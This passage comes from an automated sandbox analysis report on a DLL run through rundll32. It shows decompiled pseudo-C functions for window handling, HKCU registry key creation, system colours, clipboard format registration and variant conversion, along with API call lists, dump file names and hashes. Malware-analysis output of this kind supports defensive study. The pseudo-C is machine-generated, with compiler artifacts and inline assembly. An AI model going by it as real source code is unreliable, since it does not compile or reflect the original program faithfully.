GetWindow.USER32(?,00000002), ref: 1001A9BB
GetWindow.USER32(?,00000002), ref: 1001A9CD
GetWindowLongA.USER32 ref: 1001A9DC
IsWindowVisible.USER32(?), ref: 1001A9F6
GetTopWindow.USER32(?), ref: 1001AA1C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
Instruction ID: afcf25548e9ffcd49ee0c38f979e935dd92c7862c2c1ebd23c82871fc7a90cd9
Opcode Fuzzy Hash: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
Instruction Fuzzy Hash: 0121B232A407516FD621DA758D05F1B76ECFF4A690F424524F981AF152EB30ECC0C761

Uniqueness

Uniqueness Score: -1.00%

Function 10010EA7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010EA7(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10010ec2
0x10010ec9
0x10010ecc
0x10010ecf
0x10010ed2
0x10010edd
0x10010f14
0x10010f14
0x10010f1f
0x10010f24
0x10010f24
0x10010f29
0x10010f2e
0x10010f2e
0x10010f37

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10010ED5
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010EF8
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010F14
RegCloseKey.ADVAPI32(?), ref: 10010F24
RegCloseKey.ADVAPI32(?), ref: 10010F2E

Strings

software, xrefs: 10010EBD

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
Instruction ID: 6908282d98887baf5b1b11d67664c0e969dcc26382147783454bf2a56fb15221
Opcode Fuzzy Hash: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
Instruction Fuzzy Hash: DF11E376D00159FBDB21DB9ACD89CDFFFBCEF89750B1040AAB600A6122D2709A41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 100021CE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrencyFormatW.KERNEL32 ref: 100021FF
GetCurrencyFormatW.KERNEL32 ref: 10002222
GetCurrencyFormatW.KERNEL32 ref: 10002238
GetCurrencyFormatW.KERNEL32 ref: 1000225F

Strings

xadqsavcbdfewescGADW, xrefs: 100021DE, 100021EC, 10002211, 10002254
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100021DF, 100021F2, 100021F7, 10002217, 1000225B

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
Instruction ID: 4ec50c83481157a01d9dbb3de4afa19c59092b64c33b3db984519a0354e02278
Opcode Fuzzy Hash: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
Instruction Fuzzy Hash: 18115176604225BFE201DB85DD81E96B7DCEF4A784F024046FF44EB2A1C721BC548EA5

Uniqueness

Uniqueness Score: -1.00%

Function 100109B6 Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100109B6(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E100209E8(0, 0);
				_t22 = E100010C9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E10004E3A(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E10020F40(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E1001FC9C(_t28);
			}

APIs

LeaveCriticalSection.KERNEL32(?), ref: 100109BD
__CxxThrowException@8.LIBCMT ref: 100109C7

Part of subcall function 100209E8: RaiseException.KERNEL32(1000511C,?,1000103F,8007000E,1000511C,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10020A28

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6), ref: 100109DE
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB

Part of subcall function 10004E3A: __CxxThrowException@8.LIBCMT ref: 10004E4E

_memset.LIBCMT ref: 10010A0A
TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
Instruction ID: 46b5b42a71e0509a224d2307cf2bd15c4222dc2e63f5f7ecafe87185b2be41b2
Opcode Fuzzy Hash: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
Instruction Fuzzy Hash: CC117C74100605AFE721EF60CC8AC6BBBA5FF08354B50C129F9869A567CB71ED90CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10010DB4 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010DB4(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x10010dbe
0x10010dc4
0x10010dcb
0x10010dd2
0x10010dd9
0x10010de6
0x10010ded
0x10010df0
0x10010df3
0x10010df7

APIs

GetSysColor.USER32(0000000F), ref: 10010DC0
GetSysColor.USER32(00000010), ref: 10010DC7
GetSysColor.USER32(00000014), ref: 10010DCE
GetSysColor.USER32(00000012), ref: 10010DD5
GetSysColor.USER32(00000006), ref: 10010DDC
GetSysColorBrush.USER32(0000000F), ref: 10010DE9
GetSysColorBrush.USER32(00000006), ref: 10010DF0

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
Instruction ID: d7120ba38cccac322e287d397fd1090e884fedfb1f22003e23e449693bce91bf
Opcode Fuzzy Hash: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
Instruction Fuzzy Hash: 4DF0F8719407489BE730BB728D49B47BAE1EFC4B10F02092AD2818BA91E6B6E0409F40

Uniqueness

Uniqueness Score: -1.00%

Function 10034F96 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10034F96() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x10048874 =  *0x10048874 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x10048874 = _t6;
					return _t6;
				}
			}

0x10034fa7
0x10034fb1
0x10034fb5
0x10034fd1
0x10034fd1
0x00000000
0x10034fd1
0x10034fb7
0x10034fbd
0x00000000
0x00000000
0x00000000
0x10034fbf
0x10034fbf
0x10034fc4
0x10034fca
0x00000000
0x10034fca

APIs

GetVersion.KERNEL32 ref: 10034F9E
GetVersion.KERNEL32 ref: 10034FA9
GetVersion.KERNEL32 ref: 10034FB1
GetVersion.KERNEL32 ref: 10034FB7
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 10034FC4

Strings

MSWHEEL_ROLLMSG, xrefs: 10034FBF

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 32f60e0fcc6082fade1895f3b1d0c0f18cc7d36d82aaeea90484ffbc470c6c03
Instruction ID: 0d45b66faa2ad64bfbc903d79e921ae9fe2923187844060e47b6127ebb4b5c7f
Opcode Fuzzy Hash: 32f60e0fcc6082fade1895f3b1d0c0f18cc7d36d82aaeea90484ffbc470c6c03
Instruction Fuzzy Hash: 78E0863EC001334EE743B7749F4035D66E4CB4A2D2F6B403AD9018F555DE2459438BB5

Uniqueness

Uniqueness Score: -1.00%

Function 10019F87 Relevance: 9.4, APIs: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10019F87(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t341;
				signed short _t343;
				void* _t344;
				intOrPtr* _t345;
				signed int _t346;
				void* _t348;
				intOrPtr _t352;
				signed long long _t358;

				_t342 = __esi;
				_t337 = __edx;
				_t282 = __ecx;
				_t346 = _t348 - 0x64;
				_t163 =  *0x10045580; // 0x2ef01728
				 *(_t346 + 0x68) = _t163 ^ _t346;
				_push(0xcc);
				E1001FBC4(E10034676, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
				_t339 = __ecx;
				 *(_t346 + 0x30) = 0;
				_t352 =  *((intOrPtr*)(__ecx + 0x48));
				_t353 = _t352 == 0;
				if(_t352 == 0) {
					L1:
					E10004E6E(0, _t282, _t339, _t342, _t353);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E1001BDF4(_t346 + 0x3c);
				_t343 = 3;
				 *((intOrPtr*)(_t346 - 4)) = 0;
				 *(_t346 + 0x50) = _t343;
				E10017AC2( *((intOrPtr*)(_t339 + 0x54)),  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
				if( *(_t346 + 0x50) != _t343) {
					_t340 =  *((intOrPtr*)(_t339 + 0x54));
					_t178 = E10015BAB( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
						_t345 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E10017807(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t346 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t346 + 0x55) > 0) {
											do {
												_t139 = _t346 + 0x55;
												 *_t139 =  *(_t346 + 0x55) - 1;
												__eflags =  *_t139;
												_t358 = _t358 /  *0x10038c38;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t346 + 0x56);
										if( *(_t346 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t346 - 0x14) = _t358;
										 *(_t346 - 0x1c) = 5;
										 *((char*)(_t346 - 4)) = 0xe;
										E1001BDD4(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
										_t203 = _t346 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t346 + 0x58) = _t358;
											_t337 =  *(_t346 + 0x34);
											 *((intOrPtr*)(_t346 + 0x60)) = 0;
											E10015A3D(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t346 = 7;
											 *(_t346 + 8) =  *(_t346 + 0x58);
											 *((char*)(_t346 - 4)) = 0xf;
											E1001BDD4(_t346, _t346 + 0x3c, _t346);
											_t203 = _t346;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t346 + 0x58) = _t358;
												 *((intOrPtr*)(_t346 + 0x60)) = 0;
												E10015A9D( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
												 *(_t346 - 0x4c) = 7;
												 *(_t346 - 0x44) =  *(_t346 + 0x58);
												 *((char*)(_t346 - 4)) = 0x10;
												E1001BDD4(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
												_t203 = _t346 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E10017866(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E10017A12(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
													 *(_t346 - 0x3c) = 7;
													 *((long long*)(_t346 - 0x34)) =  *_t231;
													 *((char*)(_t346 - 4)) = 0x11;
													E1001BDD4(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
													_t203 = _t346 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E1000563B(0, _t346 + 0x50, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 2;
								_t237 = E1001C08A(0, _t346 - 0xbc, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 3;
								E1001BDD4(_t237, _t346 + 0x3c, _t237);
								 *_t345(_t346 - 0xbc,  *_t235, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
								_t295 =  *(_t346 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E1001BD1D(_t346 - 0x9c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t346 - 4)) = 0xb;
										E1001BDD4(_t243, _t346 + 0x3c, _t243);
										_t203 = _t346 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E1001BF8E(_t346 - 0x8c, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
											 *((char*)(_t346 - 4)) = 1;
											E1001BDD4(_t246, _t346 + 0x3c, _t246);
											_t203 = _t346 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
													 *(_t346 - 0x5c) = 0x11;
													 *((char*)(_t346 - 0x54)) =  *_t248;
													 *((char*)(_t346 - 4)) = 6;
													E1001BDD4(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
													_t203 = _t346 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E10005525(0, _t346 + 0x30, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 4;
										_t189 = E1001C08A(0, _t346 - 0xcc, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 5;
										E1001BDD4(_t189, _t346 + 0x3c, _t189);
										 *_t345(_t346 - 0xcc,  *_t187, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
										_t295 =  *(_t346 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t346 - 4)) = 0;
										E10001260(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E1001BD1D(_t346 - 0xac,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t346 - 4)) = 7;
											E1001BDD4(_t254, _t346 + 0x3c, _t254);
											_t203 = _t346 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E1001BD44(_t346 - 0x7c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
												 *((char*)(_t346 - 4)) = 8;
												E1001BDD4(_t257, _t346 + 0x3c, _t257);
												_t203 = _t346 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t346 + 0x50) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
													 *(_t346 + 0x10) = 4;
													 *(_t346 + 0x18) =  *(_t346 + 0x50);
													 *((char*)(_t346 - 4)) = 9;
													E1001BDD4(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
													_t203 = _t346 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t346 - 0x24) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
														 *(_t346 - 0x2c) = 5;
														 *((char*)(_t346 - 4)) = 0xa;
														E1001BDD4(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
														_t203 = _t346 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
															 *(_t346 + 0x20) = 6;
															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t346 - 4)) = 0xd;
															E1001BDD4(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
															_t203 = _t346 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t346 - 0x64) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
																 *(_t346 - 0x6c) = 7;
																 *((char*)(_t346 - 4)) = 0xc;
																E1001BDD4(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
																_t203 = _t346 - 0x6c;
																L30:
																 *((char*)(_t346 - 4)) = 0;
																 *_t345(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
						 *_t345(_t346 + 0x3c);
					}
				} else {
					L4:
					E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
					__imp__#9(_t346 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
				_pop(_t341);
				_pop(_t344);
				_pop(_t281);
				return E1001FBB5( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
			}

APIs

__EH_prolog3.LIBCMT ref: 10019FA3
VariantClear.OLEAUT32(?), ref: 1001A008

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

VariantClear.OLEAUT32(?), ref: 1001A217
